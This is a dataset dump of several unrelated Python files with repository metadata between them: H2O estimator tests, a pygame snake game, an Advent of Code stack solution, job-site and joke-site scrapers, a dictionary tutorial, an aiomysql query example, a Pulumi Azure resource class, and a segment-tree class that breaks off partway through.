def test_params_are_correctly_passed_to_underlying_estimator():
estimator = H2OGradientBoostingEstimator(seed=seed)
estimator.set_params(max_depth=10, learn_rate=0.5)
estimator.model_id = "dummy"
assert estimator.estimator is None
estimator._make_estimator() # normally done when calling `fit`
real_estimator = estimator.estimator
assert real_estimator
parms = real_estimator._parms
assert real_estimator.seed == parms['seed'] == seed
assert real_estimator.max_depth == parms['max_depth'] == 10
assert real_estimator.learn_rate == parms['learn_rate'] == 0.5
assert real_estimator._id == parms['model_id'] == "dummy"
assert real_estimator.training_frame == parms['training_frame'] is None
def test_params_are_correctly_passed_to_underlying_automl():
estimator = H2OAutoMLEstimator(seed=seed)
estimator.set_params(max_models=5, nfolds=0)
estimator.project_name = "dummy"
assert estimator.estimator is None
estimator._make_estimator() # normally done when calling `fit`
aml = estimator.estimator
assert aml
assert aml.build_control["stopping_criteria"]["seed"] == seed
assert aml.build_control["stopping_criteria"]["max_models"] == 5
assert aml.build_control["nfolds"] == 0
assert aml.build_control["project_name"] == "dummy"
pyunit_utils.run_tests([
test_all_params_are_visible_in_get_params,
test_all_params_can_be_set_using_set_params,
test_all_params_are_accessible_as_properties,
test_all_params_can_be_set_as_properties,
test_params_conflicting_with_sklearn_api_are_still_available,
test_params_are_correctly_passed_to_underlying_transformer,
test_params_are_correctly_passed_to_underlying_estimator,
test_params_are_correctly_passed_to_underlying_automl,
])
|
[
"[email protected]"
] | |
e9d1caab6dde00c07ce3832efe253d9348ac4a88
|
940dcf18bb1db19610e29902c78ec703690c4297
|
/pygame/py002.py
|
17a13a71d3e9bdeacc203460516516e052a3e799
|
[] |
no_license
|
Sahil4UI/PythonRegular11-12Dec2020
|
dc20e8d13d191801301d18d5b92f5775fe9c0674
|
0b22b1d8c703ac21a1f02c2b10f327bcb2e96460
|
refs/heads/main
| 2023-02-27T13:00:22.415199 | 2021-01-31T06:57:58 | 2021-01-31T06:57:58 | 318,424,644 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,076 |
py
|
import random
import pygame
import time
from pygame.locals import *
pygame.init()
H= 600
W=800
gameScreen= pygame.display.set_mode((W,H))
color= (255,255,255)
red = (255 , 0 , 0 )
blue = (0,0,255)
w=30
h=30
pygame.time.set_timer(USEREVENT,1000)
frog=pygame.image.load("frog.png")#raw string-path
frog = pygame.transform.scale(frog,(50,50))
audio = pygame.mixer.Sound("point.wav")
def Score(counter):
font=pygame.font.SysFont(None,30)
#anti aliasing ->texture-> True
text=font.render(f"Score : {counter}",True,blue)
gameScreen.blit(text,(10,10))
def Snake(snakeList):
for i in snakeList:
pygame.draw.rect(gameScreen,red,[i[0],i[1],w,h])
def Timer(sec):
font=pygame.font.SysFont(None,30)
#anti aliasing ->texture-> True
text=font.render(f"Time Left : {sec} seconds",True,blue)
gameScreen.blit(text,(500,10))
def gameOver():
pass
# font=pygame.font.SysFont(None,30)
# #anti aliasing ->texture-> True
# text=font.render(f"***GAME OVER***",True,blue)
# gameScreen.blit(text,(500,10))
def main():
movex = 0
movey = 0
frogX = random.randint(0,W-50)
frogY = random.randint(0,H-50)
x=0
y=0
sec=20
counter=0
snakeList= []
snakeLength=1
while True:
gameScreen.fill(color)
for event in pygame.event.get():
if event.type==pygame.QUIT:
pygame.quit()
quit()
elif event.type==pygame.USEREVENT:
sec-=1
if event.type==pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
movex=-1
movey=0
elif event.key == pygame.K_RIGHT:
movex=1
movey=0
elif event.key==pygame.K_UP:
movey=-1
movex=0
elif event.key==pygame.K_DOWN:
movey=1
movex=0
# gameScreen.blit(image,(imageX,imageY))
snake = pygame.draw.rect(gameScreen,red,[x,y,w,h])
snakeList.append([x,y])
Snake(snakeList)
frogRect = pygame.Rect([frogX,frogY,50,50])
gameScreen.blit(frog,(frogX,frogY))
x += movex
y += movey
if x>W-w:
movex=-1
elif x<0:
movex=1
if y>H-h:
movey=-1
elif y<0:
movey=1
Score(counter)
Timer(sec)
if sec <0:
gameOver()
if snakeLength<len(snakeList):
del snakeList[0]
if snake.colliderect(frogRect):
frogX = random.randint(0,W-50)
frogY = random.randint(0,H-50)
counter+=1
audio.play()
snakeLength+=20
pygame.display.update()
main()
|
[
"[email protected]"
] | |
b540a1018ada187e4e6e105e8d050f936df3061b
|
f416ab3adfb5c641dc84022f918df43985c19a09
|
/problems/advent-of-code/2022/05/sol2.py
|
78cf7599b31d96f7b01fd8ad778ed956290eda79
|
[] |
no_license
|
NicoKNL/coding-problems
|
a4656e8423e8c7f54be1b9015a9502864f0b13a5
|
4c8c8d5da3cdf74aefcfad4e82066c4a4beb8c06
|
refs/heads/master
| 2023-07-26T02:00:35.834440 | 2023-07-11T22:47:13 | 2023-07-11T22:47:13 | 160,269,601 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,530 |
py
|
import sys
def splitInput(lines):
stack_data = []
moves = []
parsing_stack = True
for line in lines:
if not line:
parsing_stack = False
continue
if parsing_stack:
stack_data.append(line)
else:
moves.append(line)
stack_count = int(stack_data[-1].split()[-1])
return stack_count, stack_data[:-1], moves
def parseStacks(count, data):
stacks = [[] for _ in range(count)]
for row in data:
print(row)
for i, c in enumerate(range(1, len(row), 4)):
if row[c].strip():
stacks[i].append(row[c])
stacks = [stack[::-1] for stack in stacks]
return stacks
def parseMoves(moves):
for i in range(len(moves)):
words = moves[i].split()
move = [words[1], words[3], words[5]] # [count, from, to]
move = list(map(int, move))
move[1] -= 1 # Use 0 based indexing
move[2] -= 1
moves[i] = move
def execute(moves, stacks):
for (count, s, t) in moves:
stacks[t].extend(stacks[s][-count:])
stacks[s] = stacks[s][:-count]
if __name__ == "__main__":
lines = [l[:-1] for l in sys.stdin]
stack_count, stack_data, moves = splitInput(lines)
stacks = parseStacks(stack_count, stack_data)
parseMoves(moves)
execute(moves, stacks)
answer = [" " for _ in range(stack_count)]
for i, stack in enumerate(stacks):
if stack:
answer[i] = stack[-1]
print("".join(answer))
|
[
"[email protected]"
] | |
37be2dd7a036a0d6c20d49738fb4226536c20ac2
|
ff21f04b692891b13fa2ed49293e5d99fea742db
|
/hunt/scripts/job_spider.py
|
41015307bdb3af0ba459f972c27a7bd7b13714fd
|
[] |
no_license
|
yangby-cryptape/job-hunter
|
3caf49c9290a077661c8e245565132e2a8671c05
|
1b58b2f23ac7d1aba08feaff29692adb8fe58161
|
refs/heads/master
| 2021-05-27T17:35:09.370516 | 2012-06-25T07:38:06 | 2012-06-25T07:38:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,263 |
py
|
#!/usr/bin/env python
#coding=utf-8
import hashlib, urllib2, time, re
from datetime import datetime
from pyquery import PyQuery as pq
from models import db, Occupational, Job, Company
def get_headers(gzip=False):
headers = {
"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13",
# "User-Agent": "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13"
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-cn,zh;q=0.5",
# "Accept-Encoding":"gzip,deflate",
"Accept-Charset":"utf-8;q=0.7,*;q=0.7",
"Keep-Alive":"115",
"Connection":"keep-alive",
# "Host":"",
# "Referer":"",
}
if gzip:
headers["Accept-Encoding"] = "gzip,deflate"
return headers
def getDomFromUrl(url):
req = urllib2.Request(
url = url,
headers = get_headers())
try:
request = urllib2.urlopen(req)
source = request.read()
request.close()
except Exception, e:
source = None
print e
ucontent = source.decode('utf-8')
dom = pq(ucontent)
return dom
def getCompanyInfo(dom):
'''获取一个公司的信息'''
info_items = dom('.companyInfoItems')
info_trs = info_items('.companyInfoTab tr')
company_info = {}
for tr in info_trs:
tr = pq(tr)
k = tr('td:eq(0)').text().split(u':')[0]
v = tr('td:eq(1)').text()
company_info[k] = v
scale = company_info.get(u'公司规模')
if scale:
sh = re.search(r'(\d+)-(\d+)', scale)
scale = sh.groups() if sh else (None, None)
else:
scale = (None, None)
####
jcs = dom('.jobContact>div>div').find('div') # Job Contact
for jc in jcs:
jc = pq(jc)
jctext = jc.text().split(u':')
if len(jctext) == 2:
k, v = jctext
company_info[k] = v
com = Company()
com.name = info_items('.companyTitle').text()
com.industry = company_info.get(u'公司行业')
com.type = company_info.get(u'公司类型')
com.address = company_info.get(u'公司地址')
com.website = company_info.get(u'公司主页')
com.scale_low, com.scale_high = scale
com.email = None
com.phone_num = None
com.description = dom('.black12 tr:eq(2)').find('td').html()
com.etag = ''
return com
def getJobInfo(dom, company):
'''获取一个职位的招聘信息'''
job_info = {}
type_tr = dom('.jobInfoItems tr:eq(0)')
trtext = type_tr.text()
trtext = trtext.split(u':') if trtext else []
if len(trtext) == 2:
k, v = trtext
v = v.replace('/', ',')
job_info[k] = v
trs = dom('.jobInfoItems tr:gt(1)')
for tr in trs:
tr = pq(tr)
tds = tr('td')
for td in tds:
td = pq(td)
tdtext = td.text().split(u':')
if len(tdtext) == 2:
k, v = tdtext
job_info[k] = v
salary = job_info.get(u'职位月薪')
if salary:
sh = re.search(r'(\d+)-(\d+)', salary)
salary = sh.groups() if sh else (None, None)
else:
salary = (None, None)
quantity = job_info.get(u'招聘人数')
if quantity:
sh = re.search(r'(\d+)', quantity)
quantity = sh.group(0) if sh else None
job = Job()
occ_type = job_info.get(u'职位类别')
occ = Occupational.query.filter(Occupational.type==occ_type).first()
if not occ:
occ = Occupational()
occ.name = 'FILL'
occ.type = occ_type
db.session.add(occ)
job.occupational = occ
job.type = job_info.get(u'工作性质')
job.exp = job_info.get(u'工作经验')
job.manage_exp = job_info.get(u'管理经验')
job.quantity = quantity
job.degree = job_info.get(u'最低学历')
job.salary_low, job.salary_high = salary
job.description = dom('.jobDes').html()
job.etag = ''
return job
def getPage(page_num):
time.sleep(0.6)
dom = getDomFromUrl('http://sou.zhaopin.com/jobs/jobsearch_jobtype.aspx?bj=160000&sj=045%3B079&jl=%E6%9D%AD%E5%B7%9E&sb=1&sm=0&p=' + page_num)
table = dom('#contentbox table:eq(1)')
trs = table('tr:gt(0)')
iseven = True
for tr in trs:
if iseven:
tr = pq(tr)
job_title = tr('#dvJobTit').text()
job_url = tr('#dvJobTit a').attr('href')
company_name = tr('#dvCompNM').text()
company_url = tr('#dvCompNM a').attr('href')
work_place = tr('td:eq(4)').text().split(' - ')
work_city = work_place[0]
work_area = work_place[1] if len(work_place) > 1 else None
public_date = tr('td:eq(5)').text()
time.sleep(0.6)
job_detail_dom = getDomFromUrl(job_url)
company = getCompanyInfo(job_detail_dom)
company.zhaopin_url = company_url
db.session.add(company)
job = getJobInfo(job_detail_dom, company)
job.company = company
job.title = job_title
job.work_city = work_city
job.work_area = work_area
job.public_date = public_date
job.zhaopin_url = job_url
db.session.add(job)
db.session.commit()
print datetime.now()
print 'This is Job %d' % job.id
iseven = not iseven
total_page = dom('.pagehead .num:eq(1)').text()
sh = re.search(r'(\d+)/(\d+)', total_page)
current_page, total_page = sh.groups() if sh else (None, None)
return int(current_page), int(total_page)
def doSpider():
print datetime.now()
print 'Start Get First page'
current_page, total_page = getPage('1')
print 'First page, Done!'
print 'Total page: %d\n' % total_page
for page_num in range(current_page+1, total_page+1):
print datetime.now()
print 'Start get page: [%d]' % page_num
getPage(str(page_num))
print 'page: [%d], Done!\n' % page_num
if __name__ == '__main__':
print 'BEGIN TEST'
doSpider()
print 'TEST DONE'
|
[
"[email protected]"
] | |
521ea38335f0c6bebf7ef64a8d68203c32de69dc
|
f97cabce5c91238678e159387f03636d4deb90fb
|
/dajare/crawler_kaishaseikatsu_jp.py
|
c0bb1bb7c7b5cf459ec22cf9603ddf779b6d4b93
|
[] |
no_license
|
vaaaaanquish/dajare-python
|
1daa8b4d31a9e3d5e1336d3b31693c1d491ed814
|
150132cef0333a94c9e286c4241af92c630cd7bd
|
refs/heads/master
| 2022-12-10T08:46:42.827279 | 2020-12-11T03:28:54 | 2020-12-11T03:28:54 | 242,304,312 | 16 | 3 | null | 2022-12-08T03:43:06 | 2020-02-22T08:09:23 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,010 |
py
|
from tqdm import tqdm
from dajare.crawler import Crawler
class CrawlerKaishaseikatsuJp(Crawler):
def run(self):
output_list = self._run()
self.output(output_list, 'dajare_kaishaseikatsu_jp.json')
def _run(self):
output_list = []
for i in tqdm(range(0, 2200, 100)):
url = f'http://archives.kaishaseikatsu.jp/cgi-bin/kaisha2/board_r.cgi?type=kaisha_dajare&next={i}&range=100'
bs = self.get_bs(url, encoding='shift-jis')
for x in bs.find_all('tr', bgcolor="#FBFFB2"):
output_list.append({
'text': x.find('td').text,
'url': url,
'author': 'kaishaseikatsu',
'author_link': 'http://archives.kaishaseikatsu.jp',
'mean_score': 0.,
'deviation_score': 0.,
'category': [],
'tag': [],
'eval_list': []
})
return output_list
|
[
"[email protected]"
] | |
879086db133bd1ab22783e38d697afc115869d4f
|
71c4a775c81179e920b72bdee87d9af3edfd4d99
|
/01_Sintaxe_Basica/10_dicionario.py
|
9ea3b3c107c7a83db1b023da9899d434b0a3d0f8
|
[] |
no_license
|
frclasso/acate18122018
|
16f4169dbfb0eb8c25e253965642122e6095a211
|
98e4697d4e34c740a537a553b5ae6841159c58f7
|
refs/heads/master
| 2020-04-08T00:54:59.822648 | 2019-01-24T16:55:42 | 2019-01-24T16:55:42 | 158,873,478 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,267 |
py
|
#!/usr/bin/env python3
aluno = {'ID': 1223,
'Nome':'Patricia',
'Idade': 27,
'Curso': 'Sistemas de Informação',
'Turno':'Noturno'
}
print(f"ID: {aluno['ID']}")
print(f"Nome: {aluno['Nome']}")
print(f"Idade:{aluno['Idade']}")
print()
'''Atualizando valores existentes'''
aluno['Idade'] = 28
print(aluno)
print()
'''Inserindo novo campo'''
aluno['Matrícula'] = 8990020198
print(aluno)
print()
# Utilizando o metodo Update
aluno.update({'Turno':'Diurno', 'Sobrenome':'Nunes', 'Telefone':'(48)555-333'})
print(aluno)
print()
'''Deletando items'''
aluno.__delitem__('Idade')
print(aluno)
print()
aluno.pop('Turno')
print(aluno)
print()
del aluno['Matrícula']
print(aluno)
print()
'''Apagando todos os dados'''
# aluno.clear()
# print(aluno) # {}
'''Deletando o dicionario em si'''
# del aluno
# print(aluno) # NameError: name 'aluno' is not defined
'''Criando um dicionario vazio'''
meuDic = {}
print(meuDic)
print(type(meuDic))
#
print(f'Tamanho do dicionario: {len(aluno)} items.')
'''Imprimindo um dicionario com as chaves - keys()'''
print(aluno.keys())
'''Imprimindo um dicionario com os valores - values()'''
print(aluno.values())
'''Imprimindo um dicionario com todos os items'''
print(aluno.items())
|
[
"[email protected]"
] | |
01e192a4c835a3d6ec4c29d6fb66176e51359dcb
|
7c27898a5f85dedf0dbbb12451b6c635861dc197
|
/tornado_overview/chapter03/aiomysql_test.py
|
8c3375ad203593d54c3a67dc4692f73aa301b121
|
[] |
no_license
|
Asunqingwen/Tornado_test_application
|
9323d3289fadf69e7b1e7685da8f631d0e88968f
|
4f3a9cda9fc081a8b83f06934bc480cd597d4ad8
|
refs/heads/master
| 2023-02-18T08:43:58.012236 | 2021-01-21T09:59:57 | 2021-01-21T09:59:57 | 330,935,556 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 662 |
py
|
import asyncio
import aiomysql
from tornado import gen, ioloop
async def go():
pool = await aiomysql.create_pool(host='192.168.10.69', port=3306,
user='root', password='root',
db='message', charset="utf8")
async with pool.acquire() as conn:
async with conn.cursor() as cur:
await cur.execute("SELECT * from message")
value = await cur.fetchone()
print(cur.description)
print(value)
pool.close()
await pool.wait_closed()
if __name__ == '__main__':
io_loop = ioloop.IOLoop.current()
io_loop.run_sync(go)
|
[
"[email protected]"
] | |
b5346db185ed928a79136d01fd3e7a44a8ff0b6e
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/PackDist/share/python/PackDistCommon.py
|
0833847cfd1065059cea672b676003e232021674
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,754 |
py
|
"""File: PackDistCommon.py
Common classes and utility functions of the PackDist package.
"""
__author__ = 'Grigori Rybkine <[email protected]>'
__version__ = '0.2.1'
__date__ = 'Wed Oct 03 2012'
__all__ = ['Error', 'InputError', 'CommandError', 'exitstatus']
import sys
import os
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return ': '.join([str(arg) for arg in self.args])
def write(self, file = sys.stderr):
print >> file, '%s: %s' % (self.__class__.__name__, self)
class InputError(Error):
"""Exception raised for errors in the input.
Attributes:
expression() -- input expression in which the error occurred
message() -- explanation of the error
"""
def __init__(self, expression, message):
Error.__init__(self, expression, message)
def expression(self):
return self.args[0]
def message(self):
return self.args[1]
class CommandError(Error):
"""Exception raised for errors executing shell commands.
Attributes:
args[0] -- shell command executing which the error occurred
args[1] -- stderr and stdout of the command
args[2] -- exit status of the command
"""
def __init__(self, cmd, output, sc = None):
Error.__init__(self, cmd, output, sc)
def exitstatus (status):
"""Return child exit status, if child terminated normally, None otherwise.
Parameter status: child process status information as returned by os.wait(),
or os.waitpid(),
os.system(), close() method of file object returned by os.popen(),
commands.getstatusoutput()
"""
if os.WIFEXITED(status):
return os.WEXITSTATUS(status)
else:
return None
|
[
"[email protected]"
] | |
b0593bc623f07101fd1c4aac9dd0a4ebc0980eb2
|
955b968d46b4c436be55daf8aa1b8fc8fe402610
|
/ch04/set_window_size.py
|
110459bc02e4e910978194acc115ddfccc6554d7
|
[] |
no_license
|
han-huang/python_selenium
|
1c8159fd1421b1f0e87cb0df20ae4fe82450f879
|
56f9f5e5687cf533c678a1c12e1ecaa4c50a7795
|
refs/heads/master
| 2020-03-09T02:24:48.882279 | 2018-04-07T15:06:18 | 2018-04-07T15:06:18 | 128,535,917 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 265 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from selenium import webdriver
driver = webdriver.Firefox()
driver.get("https://mail.google.com")
# 參數字為像素點
print("設定瀏覽器寬480 高800顯示")
driver.set_window_size(480, 800)
# driver.quit()
|
[
"vagrant@LaravelDemoSite"
] |
vagrant@LaravelDemoSite
|
87fa353d224bca02fb3655134746bec120ffc10b
|
90419da201cd4948a27d3612f0b482c68026c96f
|
/sdk/python/pulumi_azure_nextgen/compute/v20191201/gallery_application_version.py
|
09d6082a067f10eae575fb0b3681e034d10ed7c2
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
test-wiz-sec/pulumi-azure-nextgen
|
cd4bee5d70cb0d332c04f16bb54e17d016d2adaf
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
refs/heads/master
| 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 |
Apache-2.0
| 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null |
UTF-8
|
Python
| false | false | 7,987 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['GalleryApplicationVersion']
class GalleryApplicationVersion(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
gallery_application_name: Optional[pulumi.Input[str]] = None,
gallery_application_version_name: Optional[pulumi.Input[str]] = None,
gallery_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
publishing_profile: Optional[pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Specifies information about the gallery Application Version that you want to create or update.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] gallery_application_name: The name of the gallery Application Definition in which the Application Version is to be created.
:param pulumi.Input[str] gallery_application_version_name: The name of the gallery Application Version to be created. Needs to follow semantic version name pattern: The allowed characters are digit and period. Digits must be within the range of a 32-bit integer. Format: <MajorVersion>.<MinorVersion>.<Patch>
:param pulumi.Input[str] gallery_name: The name of the Shared Application Gallery in which the Application Definition resides.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']] publishing_profile: The publishing profile of a gallery Image Version.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if gallery_application_name is None:
raise TypeError("Missing required property 'gallery_application_name'")
__props__['gallery_application_name'] = gallery_application_name
if gallery_application_version_name is None:
raise TypeError("Missing required property 'gallery_application_version_name'")
__props__['gallery_application_version_name'] = gallery_application_version_name
if gallery_name is None:
raise TypeError("Missing required property 'gallery_name'")
__props__['gallery_name'] = gallery_name
if location is None:
raise TypeError("Missing required property 'location'")
__props__['location'] = location
if publishing_profile is None:
raise TypeError("Missing required property 'publishing_profile'")
__props__['publishing_profile'] = publishing_profile
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['replication_status'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/latest:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:GalleryApplicationVersion")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(GalleryApplicationVersion, __self__).__init__(
'azure-nextgen:compute/v20191201:GalleryApplicationVersion',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'GalleryApplicationVersion':
"""
Get an existing GalleryApplicationVersion resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return GalleryApplicationVersion(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publishingProfile")
def publishing_profile(self) -> pulumi.Output['outputs.GalleryApplicationVersionPublishingProfileResponse']:
"""
The publishing profile of a gallery Image Version.
"""
return pulumi.get(self, "publishing_profile")
@property
@pulumi.getter(name="replicationStatus")
def replication_status(self) -> pulumi.Output['outputs.ReplicationStatusResponse']:
"""
This is the replication status of the gallery Image Version.
"""
return pulumi.get(self, "replication_status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
[
"[email protected]"
] | |
8e4baaae320644a77b9d51ae74ea221201759574
|
1825283527f5a479204708feeaf55f4ab6d1290b
|
/leetcode/segmented-tree/leon.py
|
9b86c455efa6252c088d2e4fb3ac6b44b59e8988
|
[] |
no_license
|
frankieliu/problems
|
b82c61d3328ffcc1da2cbc95712563355f5d44b5
|
911c6622448a4be041834bcab25051dd0f9209b2
|
refs/heads/master
| 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 |
HTML
|
UTF-8
|
Python
| false | false | 6,843 |
py
|
# https://github.com/yuexihan/leonLPST/blob/master/leonLPST.py
from __future__ import division
from six.moves import xrange
class LPSTree:
"""
LPSTree(n[, value=None[, reducef=None[, modulo=None]]]) -> new LPSTree
Build a new LPSTree with n elements.
If value is provided, all elements are set to value, otherwise 0.
Default reduce function is sum. Can alse be set to max or min.
If modulo is provide, modulo operation will be donw automatically.
"""
def __init__(self, n, value=None, reducef=None, modulo=None):
if n <= 0:
raise ValueError("n most be greater than 0")
self.n = n
size = 1;
while(size < n):
size *= 2
size *= 2
self.size = size
self.tree = [None] * size
self.boolset = [False] * size
self.booladd = [False] * size
self.lazyset = [None] * size
self.lazyadd = [None] * size
self.modulo = modulo
if not reducef:
reducef = sum
if reducef == sum:
self.nodef = (lambda val, n: val*n)
elif reducef == max or reducef == min:
self.nodef = (lambda val, n: val)
else:
raise ValueError("reducef can only be sum, max or min")
if self.modulo:
self.reducef = lambda x: reducef(x) % self.modulo
else:
self.reducef = reducef
if value != None:
array = [value] * n
else:
array = [0] * n
def construct(tree, array, sleft, sright, v):
if sleft+1 == sright:
tree[v] = array[sleft]
return tree[v]
smid = (sleft + sright) // 2
tree[v] = self.reducef((construct(tree, array, sleft, smid, 2*v+1),
construct(tree, array, smid, sright, 2*v+2)))
# if self.modulo:
# tree[v] %= self.modulo
# print tree
return tree[v]
construct(self.tree, array, 0, n, 0)
def __len__(self):
return self.n
def _lazypropagate(self, v, vleft, vright):
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
vmid = (vleft + vright) // 2
# print tree, v, tree[2*v+1], boolset[v], booladd[v]
if boolset[v]:
tree[2*v+1] = self.nodef(lazyset[v], vmid-vleft)
tree[2*v+2] = self.nodef(lazyset[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
boolset[2*v+1] = boolset[2*v+2] = True
booladd[2*v+1] = booladd[2*v+2] = False
lazyset[2*v+1] = lazyset[2*v+2] = lazyset[v]
boolset[v] = False
if booladd[v]:
tree[2*v+1] += self.nodef(lazyadd[v], vmid-vleft)
tree[2*v+2] += self.nodef(lazyadd[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
if booladd[2*v+1]:
lazyadd[2*v+1] += lazyadd[v]
else:
booladd[2*v+1] = True
lazyadd[2*v+1] = lazyadd[v]
if booladd[2*v+2]:
lazyadd[2*v+2] += lazyadd[v]
else:
booladd[2*v+2] = True
lazyadd[2*v+2] = lazyadd[v]
booladd[v] = False
# print tree, v, tree[2*v+1]
def get(self, start, stop):
"""
LPSTree.get(start, stop) -> value
You can assume it same as reduce(reducef, tree[start:stop]).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _get(sleft, sright, v, vleft, vright):
# print v, start, stop, vleft, vright, tree
if sleft>=vright or sright <= vleft:
return
if sleft<=vleft and sright >= vright:
# if self.modulo:
# tree[v] %= self.modulo
return tree[v]
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
# print v, start, stop, vleft, vright, tree
return self.reducef([x for x in
(_get(sleft, sright, 2*v+1, vleft, vmid),
_get(sleft, sright, 2*v+2, vmid, vright))
if x != None])
return _get(start, stop, 0, 0, n)
def set(self, start, stop, value):
"""
LPSTRee.set(start, stop, value)
Set all elements in [start, stop) to value.
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _set(sleft, sright, v, vleft, vright, value):
# print v, start, stop, vleft, vright, value, tree
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] = self.nodef(value, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
boolset[v] = True
booladd[v] = False
lazyset[v] = value
# print v, tree, tree[v], tree[v] % self.modulo
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_set(sleft, sright, 2*v+1, vleft, vmid, value)
